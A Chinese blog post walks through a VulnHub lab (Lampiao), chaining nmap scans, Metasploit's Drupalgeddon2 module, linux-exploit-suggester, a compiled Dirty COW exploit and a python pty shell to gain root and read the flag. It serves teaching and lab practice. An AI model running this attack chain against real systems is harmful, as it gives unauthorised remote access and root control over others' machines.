Linux脏牛内核漏洞复现

最新推荐文章于 2024-08-03 23:12:25 发布
最新推荐文章于 2024-08-03 23:12:25 发布
阅读量1.7k 收藏 6
点赞数 4
文章标签: 安全 系统安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_27862405/article/details/125089208
版权

脏牛漏洞

又叫Dirty COW,存在Linux内核中已经有长达9年的时间,在2007年发布的Linux内核版本中就已经存在此漏洞。Linux kernel团队在2016年10月18日已经对此进行了修复。

漏洞范围:Linux内核 >= 2.6.22(2007年发行,到2016年10月18日才修复)

简要分析:该漏洞具体为,Linux内核的内存子系统在处理写入复制(copy-on-write, COW)时产生了竞争条件(race condition)。恶意用户可利用此漏洞,来获取高权限,对只读内存映射进行写访问。竞争条件,指的是任务执行顺序异常,可导致应用崩溃,或令攻击者有机可乘,进一步执行其他代码。利用这一漏洞,攻击者可在其目标系统提升权限,甚至可能获得root权限。

靶场地址:

https://www.vulnhub.com/entry/lampiao-1,249/

下载好靶机直接在VM虚拟机打开即可,靶机界面如下:

 

一、信息收集

nmap 192.168.174.0/24

nmap 192.168.174.155 -p1-65535

IP:192.168.174.155

端口:22,80,1898

访问80端口

 

访问1898端口

 

web指纹识别,CMS为Drupal

 

 利用kail的msf搜索Drupal漏洞

search drupal

 二、漏洞利用

这里使用exploit/unix/webapp/drupal_drupalgeddon2

use exploit/unix/webapp/drupal_drupalgeddon2
show options
set rhosts 192.168.174.155
set rport 1898
exploit

成功返回会话

 上传linux漏洞检测脚本,脚本链接:GitHub - mzet-/linux-exploit-suggester: Linux privilege escalation auditing tool

upload /root/linux-exploit-suggester.sh /tmp/1.sh

成功上传

 

 shell会话执行脚本

cd /tmp
chmod +x 1.sh
./1.sh

 

 检测出靶机存在脏牛漏洞

 下载exp:https://github.com/gbonacini/CVE-2016-5195

上传到靶机/tmp目录

upload /root/dcow.cpp /tmp/1.cpp

进入shell会话编译exp

cd /tmp
g++ -Wall -pedantic -O2 -std=c++11 -pthread -o dcow 40847.cpp -lutil   //编译exp
python -c 'import pty; pty.spawn("/bin/bash")'   //将简单的shell转换为完全交互式的TTY

编译成功,交互式sh成功显示,执行dcow(这里成功把root密码改为dirtyCowFun,并不会影响原来的root账号,相当于复制了一个root账号)

  ​​​​​​​

 成功获取root权限,确认主机为192.168.174.155 

成功读取flag  

白胡椒·
关注
  • 4
    点赞
  • 6
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
Linux脏牛漏洞提权复现
wangyuxiang946的博客
07-22 1万+
操作系统: Linux ( CentOS 6.5)Web服务: PHP+Apache
Linux通用系统高危漏洞(CVE-2024-1086)修复案例
企业实战系列集 ●●● https://ximenjianxue.blog.csdn.net
06-26 1400
2024年3月28日,监 Linux kernel权限提升漏洞(CVE-2024-1086)的PoC/EXP在互联网上公开,该漏洞的CVSS评分为7.8,目前漏洞细节已经公开披露,美国网络安全与基础设施安全局(CISA)6月1日也更新了其已知漏洞(KEV)目录,要求联邦机构在 2024 年 6 月 20 日之前打上补丁,修复追踪编号为 CVE-2024-1086 的 Linux 内核权限提升漏洞。由于该漏洞的公开性,攻击者可能会利用这个漏洞进行恶意攻击,因此建议尽快采取修复措施。
2024年运维最全Linux脏牛漏洞提权复现_脏牛文件编译命令
05-01 175
【代码】2024年运维最全Linux脏牛漏洞提权复现_脏牛文件编译命令。
Linux系统漏洞复现分析,linux 内核溢出漏洞利用分析
weixin_39732491的博客
04-29 261
0x01 环境搭建文件: centos6.9 x64位, linux-kernel-2.6.32.29 内核源码工具: qemu平台: archlinux打开终端,创建一个使用10G 的qcow2 文件Qemu-img create –f qcow2 centos.qcow2 10G开始安装centosQemu-system-x86_64 –hda centos.qco2 –m 1024M –bo...
脏牛Dirty漏洞复现
Polemo的博客
03-27 1984
漏洞范围: Linux kernel >= 2.6.22(2007年发行,到2016年10月18日才修复) 危害: 低权限用户利用该漏洞可以在众多Linux系统上实现本地提权 简要分析: 该漏洞具体为,get_user_page内核函数在处理Copy-on-Write(以下使用COW表示)的过程中,可能产出竞态条件造成COW过程被破坏,导致出现写数据到进程地址空间内只读内存区域的机会。修改s...
脏牛漏洞影响的linux内核,CVE-2016-5195 脏牛漏洞Linux内核通杀提权漏洞验证 | 聂扬帆博客...
weixin_33433067的博客
04-30 482
一、漏洞简介漏洞编号:CVE-2016-5195漏洞名称:脏牛(Dirty COW)漏洞危害:低权限用户利用该漏洞技术可以在全版本Linux系统上实现本地提权影响范围:Linux内核>=2.6.22(2007年发行)开始就受影响了,直到2016年10月18日才修复。Android 7.0最新的10月补丁安全级别的系统上测试过漏洞POC,确认Android受影响二、漏洞影响1. 没有权限的本地...
脏牛提权(靶机复现
tubug的博客
03-26 2256
脏牛漏洞,又叫Dirty COW,存在Linux内核中已经有长达9年的时间,在2007年发布的Linux内核版本中就已经存在此漏洞Linux kernel团队在2016年10月18日已经对此进行了修复。漏洞范围Linux内核 >= 2.6.22(2007年发行,到2016年10月18日才修复)漏洞编号脏牛的CVE编号是CVE-2016-5195。漏洞危害低权限用户利用该漏洞技术可以在全版本Linux系统上实现本地提权漏洞原理。
提权—Linux 脏牛内核漏洞&SUID&信息收集
qi_SJQ_的博客
02-04 2814
1.Linux信息收集: Linux 提权自动化脚本 4个脚本(这几个项目都可以在github找到): 两个信息收集:LinEnum,linuxprivchecker 两个漏洞探针:linux-exploit-suggester ,linux-exploit-suggester2 1)LinEnum:通过webshell等权限将脚本上传到/tmp目录然后执行即可(这个目录是一个临时目录,重启后会清空,一般是可以进行读写的,上传其他目录可能会因为权限不够而失败)。 2)Linuxprivchecker:.
Linux脏牛提权漏洞复现(CVE-2016-5195)
小千安全
05-06 650
脏牛漏洞是一个严重的漏洞,可以允许攻击者获得管理员权限。为了保护系统的安全,请及时更新内核并采取其他安全措施。
脏牛Linux本地提权漏洞复现(CVE2016-5195)
Ping_Pig的博客
10-24 2442
漏洞介绍: 脏牛漏洞(CVE2016-5195)是公开后影响范围最广和最深的漏洞之一,到2016被修复只十年来的每一个linux版本包括Android,桌面版和服务器版都受其影响。恶意攻击者可以轻易绕过常用的漏洞防御方法,对几百万用户进行攻击。国外安全公司Bindecy对该补丁和内容做出深入研究后发现补丁任然存在缺陷,由此还衍生出了“大脏牛漏洞 漏洞范围: Linux kernel &gt...
新版脏牛Linux内核提权漏洞CVE-2022-0847
03-09
5.8 <= Linux kernel 中的一个漏洞,它允许覆盖任意只读文件中的数据。这会导致权限提升,因为非特权进程可以将代码注入根进程。 修复版本:Linux 5.16.11、5.15.25 和 5.10.102 中修复。
exploit (Linux 内核CVE-2024-1086漏洞复现脚本)
06-06
Linux 内核CVE-2024-1086漏洞复现脚本。 在普通用户下,将文件上传后,chmod 777 exploit ,然后运行 ./exploit ,提权成功,输入id,可看到已经是root权限 。
脏牛提权复现以及如何得到一个完全交互的shell1
08-03
脏牛漏洞(CVE-2016-5195),又称 Dirty COW,是一个严重的Linux内核安全漏洞,自2007年起存在于多个Linux发行版中,并于2016年10月18日被公开披露并修复。这个漏洞源于内核中的`get_user_pages`函数在处理Copy-on-...
DirtyCow提权漏洞复现(CVE-2016-5195)1
08-08
脏牛(Dirty Cow)漏洞,全称为“竞争条件写入时复制”(Copy-on-Write Race Condition),在2016年被发现,其安全漏洞编号为CVE-2016-5195。这个漏洞主要影响的是Linux内核,特别是从2007年的2.6.22版本到修复前的...
红队测试之Linux提权小结1
08-03
Linux内核提权漏洞为例,如著名的“脏牛漏洞,它暴露了Linux内核的内存管理问题,允许攻击者从低权限用户提升到root权限。检测和利用这些漏洞的工具,如`linux-exploit-suggester`,可以帮助安全研究人员或攻击...
赛蓝企业管理系统 AuthToken/Index 身份认证绕过漏洞复现
0xSec
08-03 205
赛蓝企业管理系统 AuthToken/Index 接口存在身份认证绕过漏洞,未授权的远程攻击者可以利用此接口构造token绕过身份认证,使用超级管理员账户登录系统后台,造成信息泄露或者恶意破坏,使系统处于极不安全的状态。
内网安全:多种横向移动方式
最新发布
8888的博客
08-03 568
DCOM:DCOM(分布式组件对象模型)是微软的一系列概念和程序接口。它支持不同的两台机器上的组件间的通信,不论它们是运行在局域网、广域网、还是Internet上。利用这个接口,客户端程序对象能够向网络中另一台计算机上的服务器程序对象发送请求,使用DCOM进行横向移动的优势之一在于,在远程主机上执行的进程将会是托管COM服务器端的软件获取DCOM列表:实验前提:1.关闭防火墙2.必须有管理员权限。
科普文:Linux系统安全加固指南
为无为,事无事,味无味。
07-25 1659
本指南仅关注安全性和隐私性,而不关注性能,可用性或其他内容。列出的所有命令都将需要root特权。以“$”符号开头的单词表示一个变量,不同终端之间可能会有所不同。选择一个好的Linux发行版有很多因素。避免分发冻结程序包,因为它们在安全更新中通常很落后不使用与Systemd机制的发行版。Systemd包含许多不必要的攻击面;它尝试做的事情远远超出了必要,并且超出了初始化系统应做的事情。使用musl作为默认的C库。
内核CVE-2024-1086漏洞复现脚本
06-19
通常情况下,内核漏洞复现脚本是非常复杂的,因为它涉及到Linux内核源代码的深入理解和可能的特定攻击向量。这些脚本可能包括以下步骤: 1. **获取源代码**:首先,你需要从Linux内核的官方git仓库或稳定版本下载...
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值